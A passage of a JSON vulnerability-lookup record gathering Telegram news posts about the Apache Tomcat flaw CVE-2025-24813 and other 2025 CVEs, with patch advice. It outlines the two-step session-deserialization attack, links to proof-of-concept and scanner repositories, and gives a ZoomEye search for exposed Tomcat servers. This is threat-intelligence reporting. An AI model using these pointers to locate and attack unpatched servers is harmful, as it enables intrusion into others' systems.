CVE-2025-24813 , \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u0430:\n\nApache Tomcat 11.0.0-M1 \u2014 11.0.2;\nApache Tomcat 10.1.0-M1 \u2014 10.1.34;\nApache Tomcat 9.0.0-M1 \u2014 9.0.98.\n\u041e\u0448\u0438\u0431\u043a\u0430 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c\u044e \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u0438\u043b\u0438 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043f\u0440\u0438 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0451\u043d\u043d\u044b\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445. \u0412 \u0447\u0430\u0441\u0442\u043d\u043e\u0441\u0442\u0438, \u0443\u0433\u0440\u043e\u0437\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442, \u0435\u0441\u043b\u0438 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0430 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0437\u0430\u043f\u0438\u0441\u0438 \u0434\u043b\u044f \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u043b\u0435\u0442\u0430 (\u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u043e), \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0430 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0430 \u0447\u0430\u0441\u0442\u0438\u0447\u043d\u043e\u0433\u043e PUT-\u0437\u0430\u043f\u0440\u043e\u0441\u0430 (\u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0430), \u0430 \u0442\u0430\u043a\u0436\u0435 \u0435\u0441\u043b\u0438 \u0443 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u0433\u043e \u0435\u0441\u0442\u044c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e \u043f\u0443\u0442\u044f\u0445 \u0438 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f\u0445 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u043c\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432.\n\n\u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0434\u0430\u043d\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u0440\u043e\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0442\u044c \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b, \u043d\u043e \u0438 \u0432\u043d\u0435\u0434\u0440\u044f\u0442\u044c \u0432 \u043d\u0438\u0445 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0447\u0435\u0440\u0435\u0437 \u0437\u0430\u043f\u0440\u043e\u0441 PUT. \u0411\u043e\u043b\u0435\u0435 \u0442\u043e\u0433\u043e, \u043f\u0440\u0438 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0451\u043d\u043d\u044b\u0445 \u043e\u0431\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0430\u0445 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430, \u0435\u0441\u043b\u0438 \u0441\u0438\u0441\u0442\u0435\u043c\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0444\u0430\u0439\u043b\u043e\u0432\u0443\u044e \u0441\u0435\u0441\u0441\u0438\u044e Tomcat \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e, \u0430 \u0432 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0438 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430, \u0443\u044f\u0437\u0432\u0438\u043c\u0430\u044f \u043a \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438.\n\n\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 Apache Tomcat \u0443\u0436\u0435 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0432 \u043e\u0431\u043d\u043e\u0432\u043b\u0451\u043d\u043d\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 9.0.99, 10.1.35 \u0438 11.0.3. \u041e\u0434\u043d\u0430\u043a\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Wallarm \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0435 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0434\u0432\u0443\u0445\u044d\u0442\u0430\u043f\u043d\u044b\u0439 \u043c\u0435\u0442\u043e\u0434 \u0430\u0442\u0430\u043a\u0438: \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442\u0441\u044f \u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0444\u0430\u0439\u043b Java-\u0441\u0435\u0441\u0441\u0438\u0438 \u0447\u0435\u0440\u0435\u0437 PUT-\u0437\u0430\u043f\u0440\u043e\u0441, \u0437\u0430\u0442\u0435\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f GET-\u0437\u0430\u043f\u0440\u043e\u0441 \u0441 \u0443\u043a\u0430\u0437\u0430\u043d\u0438\u0435\u043c \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u0430 \u0441\u0435\u0441\u0441\u0438\u0438 (JSESSIONID), \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u043f\u0440\u0438 \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438.\n\n\u041e\u0442\u043c\u0435\u0447\u0430\u0435\u0442\u0441\u044f, \u0447\u0442\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0434\u0430\u043d\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0438 \u043d\u043e\u0441\u0438\u0442 \u043a\u0440\u0430\u0439\u043d\u0435 \u043d\u0438\u0437\u043a\u0438\u0439 \u043f\u043e\u0440\u043e\u0433 \u0432\u0445\u043e\u0434\u0430. \u0415\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0435 \u0442\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u0435 \u2014 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 Tomcat \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0433\u043e \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0430 \u0441\u0435\u0441\u0441\u0438\u0439.\n\n\u0411\u043e\u043b\u0435\u0435 \u0442\u043e\u0433\u043e, \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043f\u0440\u043e\u0433\u043d\u043e\u0437\u0438\u0440\u0443\u044e\u0442, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0432\u0441\u043a\u043e\u0440\u0435 \u043d\u0430\u0447\u043d\u0443\u0442 \u0430\u0434\u0430\u043f\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0442\u0430\u043a\u0442\u0438\u043a\u0443, \u043d\u0435 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0432\u0430\u044f\u0441\u044c \u043c\u0430\u043d\u0438\u043f\u0443\u043b\u044f\u0446\u0438\u0435\u0439 \u0441 \u0441\u0435\u0441\u0441\u0438\u044f\u043c\u0438. \u0412\u043e\u0437\u043c\u043e\u0436\u043d\u044b \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 JSP-\u0444\u0430\u0439\u043b\u043e\u0432, \u043c\u043e\u0434\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0439 \u0438 \u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d\u0438\u0435 \u0431\u044d\u043a\u0434\u043e\u0440\u043e\u0432 \u0432\u043d\u0435 \u043e\u0431\u043b\u0430\u0441\u0442\u0438 \u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0441\u0435\u0441\u0441\u0438\u0439.\n\n\u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 Apache Tomcat \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u0440\u0435\u0435 \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u0434\u043b\u044f \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044f \u0430\u0442\u0430\u043a.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2025-03-18T07:57:43.000000Z"}, {"uuid": "ff4e5bae-8deb-403d-98ac-6594ac65f679", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/itsec_news/5777", "content": "\u200b\u26a1\ufe0f11 \u0446\u0438\u0444\u0440\u043e\u0432\u044b\u0445 \u0434\u044b\u0440, \u0447\u0435\u0440\u0435\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0436\u043d\u043e \u0443\u043d\u0435\u0441\u0442\u0438 \u0432\u0441\u0451: \u043e\u0442 \u0434\u0430\u043d\u043d\u044b\u0445 \u0434\u043e \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043d\u0438\u044f\n\n\ud83d\udcac \u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b Positive Technologies \u043e\u0442\u043d\u0435\u0441\u043b\u0438 \u043a \u0447\u0438\u0441\u043b\u0443 \u0442\u0440\u0435\u043d\u0434\u043e\u0432\u044b\u0445 \u0435\u0449\u0451 \u043e\u0434\u0438\u043d\u043d\u0430\u0434\u0446\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044e\u0449\u0438\u0445 \u043a\u043b\u044e\u0447\u0435\u0432\u044b\u0435 \u044d\u043b\u0435\u043c\u0435\u043d\u0442\u044b \u0446\u0438\u0444\u0440\u043e\u0432\u043e\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b. \u0412 \u0441\u043f\u0438\u0441\u043e\u043a \u0432\u043e\u0448\u043b\u0438 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b Microsoft, \u0433\u0438\u043f\u0435\u0440\u0432\u0438\u0437\u043e\u0440\u044b VMware, \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 Kubernetes \u0438 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440 Apache Tomcat.\n\nMicrosoft\n\nCVE-2024-30085 \u2014 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0435 Windows Cloud Files Mini Filter (CVSS 7.8) \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c SYSTEM-\u0434\u043e\u0441\u0442\u0443\u043f. \u041e\u0448\u0438\u0431\u043a\u0430 \u0432\u044b\u0437\u0432\u0430\u043d\u0430 \u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435\u043c \u0431\u0443\u0444\u0435\u0440\u0430 \u043a\u0443\u0447\u0438 \u043f\u0440\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 \u0431\u0438\u0442\u043e\u0432\u044b\u0445 \u043a\u0430\u0440\u0442. \u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 : \u0441\u0435\u0433\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f \u0441\u0435\u0442\u0438, PoLP, \u0443\u0441\u0438\u043b\u0435\u043d\u043d\u044b\u0439 \u043c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u043d\u0433.\n\nCVE-2025-24983 \u2014 \u043e\u0448\u0438\u0431\u043a\u0430 \u0432 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u044f\u0434\u0440\u0430 Win32 (CVSS 7.0) \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0447\u0435\u0440\u0435\u0437 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u0443\u044e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0443, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0433\u043e\u043d\u043a\u0443. \u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 : \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u043f\u0440\u0430\u0432, \u043c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u043d\u0433 \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u044d\u0441\u043a\u0430\u043b\u0430\u0446\u0438\u0438.\n\nCVE-2025-26633 \u2014 \u043e\u0431\u0445\u043e\u0434 \u0437\u0430\u0449\u0438\u0442\u044b \u0432 Microsoft Management Console (CVSS 7.0). \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0432\u043d\u0435\u0434\u0440\u0438\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 MSC-\u0444\u0430\u0439\u043b \u0447\u0435\u0440\u0435\u0437 \u0444\u0438\u0448\u0438\u043d\u0433. \u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 : \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0430 MSC \u0438 VHD-\u0444\u0430\u0439\u043b\u043e\u0432 \u043d\u0430 \u043f\u0440\u043e\u043a\u0441\u0438 \u0438 \u043c\u0435\u0436\u0441\u0435\u0442\u0435\u0432\u044b\u0445 \u044d\u043a\u0440\u0430\u043d\u0430\u0445.\n\nCVE-2025-24071 \u2014 \u0441\u043f\u0443\u0444\u0438\u043d\u0433 \u0432 Windows File Explorer (CVSS 7.5). \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c NTLM-\u0445\u0435\u0448\u0438, \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044f LIBRARY-MS-\u0444\u0430\u0439\u043b\u044b. \u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 : \u043f\u043e\u0434\u043f\u0438\u0441\u044b\u0432\u0430\u043d\u0438\u0435 SMB, \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 NTLM.\n\nCVE-2025-24993 \u2014 RCE \u0432 \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 NTFS (CVSS 7.8). \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0447\u0435\u0440\u0435\u0437 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 VHD-\u0434\u0438\u0441\u043a.\n\nCVE-2025-24985 \u2014 \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u0430\u044f RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Fast FAT (CVSS 7.8), \u0442\u0430\u043a\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 VHD \u0434\u043b\u044f \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e.\n\nVMware\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Shadowserver, \u0431\u043e\u043b\u0435\u0435 40 \u0442\u044b\u0441. \u0443\u0437\u043b\u043e\u0432 ESXi \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u0438\u0437\u0432\u043d\u0435 \u0438 \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u0440\u0438\u0441\u043a\u0443:\n\nCVE-2025-22224 (CVSS 9.3) \u2014 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c \u0447\u0435\u0440\u0435\u0437 TOCTOU \u0432 \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0435 ESXi \u0438 Workstation.\n\nCVE-2025-22225 (CVSS 8.2) \u2014 \u0437\u0430\u043f\u0438\u0441\u044c \u043a\u043e\u0434\u0430 \u0432 \u043e\u0431\u043b\u0430\u0441\u0442\u044c \u044f\u0434\u0440\u0430 VMX-\u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430.\n\nCVE-2025-22226 (CVSS 7.1) \u2014 \u0443\u0442\u0435\u0447\u043a\u0430 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0447\u0435\u0440\u0435\u0437 \u0447\u0442\u0435\u043d\u0438\u0435 \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u0430\u043c\u0438 \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c\u043e\u0433\u043e \u0434\u0438\u0430\u043f\u0430\u0437\u043e\u043d\u0430 \u0432 HGFS.\n\n\u0420\u0435\u0448\u0435\u043d\u0438\u044f : \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 VMware Workstation 17.6.3, Fusion 13.6.3 \u0438 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u043f\u0430\u0442\u0447\u0435\u0439.\n\nKubernetes\n\nCVE-2025-1974 (CVSS 9.8) \u2014 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 ingress-nginx \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043a\u043e\u0434 \u043d\u0430 \u0443\u0440\u043e\u0432\u043d\u0435 \u043a\u043b\u0430\u0441\u0442\u0435\u0440\u0430. \u041f\u043e\u0434 \u0443\u0434\u0430\u0440\u043e\u043c \u0431\u043e\u043b\u0435\u0435 6500 \u0438\u043d\u0441\u0442\u0430\u043d\u0441\u043e\u0432, \u043f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Wiz .\n\n\u041c\u0435\u0440\u044b \u0437\u0430\u0449\u0438\u0442\u044b : \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 ingress-nginx, \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 Validating Admission Controller \u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u043e\u0432.\n\nApache\n\nCVE-2025-24813 (CVSS 9.8) \u2014 RCE \u0432 Tomcat \u0447\u0435\u0440\u0435\u0437 \u0447\u0430\u0441\u0442\u0438\u0447\u043d\u044b\u0435 PUT-\u0437\u0430\u043f\u0440\u043e\u0441\u044b \u0438 \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044e. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 Rapid7 \u0432\u044b\u044f\u0432\u0438\u043b\u043e ~200 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432.\n\n\u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 : \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043e Tomcat 9.0.99, 10.1.35, 11.0.3 \u0438 \u0432\u044b\u0448\u0435.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2025-04-11T17:25:57.000000Z"}, {"uuid": "d403bdcb-35b8-4cae-b60b-30ba2757df54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/TopCyberTechNews/432", "content": "Top Security News for Today\n\nImpossible XXE in PHP  \nhttps://www.reddit.com/r/netsec/comments/1j9f0i7/impossible_xxe_in_php/\n\nAnalysis of CVE-2025-24813 Apache Tomcat Path Equivalence RCE  \nhttps://www.reddit.com/r/netsec/comments/1j9f0ur/analysis_of_cve202524813_apache_tomcat_path/\n\nCybersecurity Can\u2019t Wait: Modern Enterprises Must Adapt  \nhttps://www.tripwire.com/state-of-security/cybersecurity-cant-wait-modern-enterprises-must-adapt\n\nPre-authentication SQL injection to RCE in GLPI (CVE-2025-24799/CVE-2025-24801)  \nhttps://www.reddit.com/r/netsec/comments/1j9hcdw/preauthentication_sql_injection_to_rce_in_glpi/\n\nChina, Russia, Iran, and North Korea Intelligence Sharing  \nhttps://www.schneier.com/blog/archives/2025/03/china-russia-iran-and-north-korea-intelligence-sharing.html\n\nBehind the Scenes of Burp AI: How we built it, and what's next  \nhttps://portswigger.net/blog/behind-the-scenes-of-burp-ai-how-we-built-it-and-whats-next\n\nNew Lumma Stealer campaign abuses Reddit threads to drop malware via fake WeTransfer links  \nhttps://www.reddit.com/r/netsec/comments/1j9xq07/new_lumma_stealer_campaign_abuses_reddit_threads/\n\nRuthless Mantis - Modus Operandi  \nhttps://www.reddit.com/r/netsec/comments/1j9v0dh/ruthless_mantis_modus_operandi/\n\nFollow Top Cyber News at https://t.me/TopCyberTechNews Feel free to DM me at https://twitter.com/ShayaFeedman", "creation_timestamp": "2025-03-13T09:30:43.000000Z"}, {"uuid": "76a68388-121a-4647-ba57-6481e409963e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/31391", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-24813-Scanner\nURL\uff1ahttps://github.com/Mattb709/CVE-2025-24813-Scanner\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-04-12T19:15:05.000000Z"}, {"uuid": "c9e7767d-cdb0-4013-86d1-6ccd42137fcd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/cyber_hsecurity/4445", "content": "This exploit targets Apache Tomcat &lt; 11.0.3, 10.1.35, and 9.0.98 via CVE-2025-24813, allowing RCE. Risks: complete server compromise. Affects millions globally.\n\nJoin: https://t.me/+qeejqIiGum9jOTI9\nContact: @a1887bot", "creation_timestamp": "2025-05-04T07:31:23.000000Z"}, {"uuid": "7ca9c943-3472-4ff2-aee6-ef8572488ffe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/18294", "content": "\ud83d\udea8CVE-2025-24813: Apache Tomcat potential RCE and/or information disclosure and/or information corruption with partial PUT\n\nZoomEye Link: https://www.zoomeye.ai/searchResult?q=YXBwPSJBcGFjaGUgVG9tY2F0Ig%3D%3D\n\nZoomEye Dork: app=\"Apache Tomcat\"\n\nResults: 815,431 \n\nAdvisory: https://github.com/advisories/GHSA-83qj-6fr2-vhqg\n\nPoC: https://github.com/absholi7ly/POC-CVE-2025-24813\n\nCVSS: 9.2\n\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\n\nFollow @zoomeye_team's official Twitter/X account and send the message \u201cDark Web Informer\u201d via DM to receive an extra 15-day membership.\n\nI am trying to do more for this community, so this is just the start! \ud83d\udc99", "creation_timestamp": "2025-06-18T16:12:19.000000Z"}, {"uuid": "d0ded87f-61ee-43fe-bc34-f699c723985a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/kasperskyb2b/1691", "content": "\u2b50\ufe0f \u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 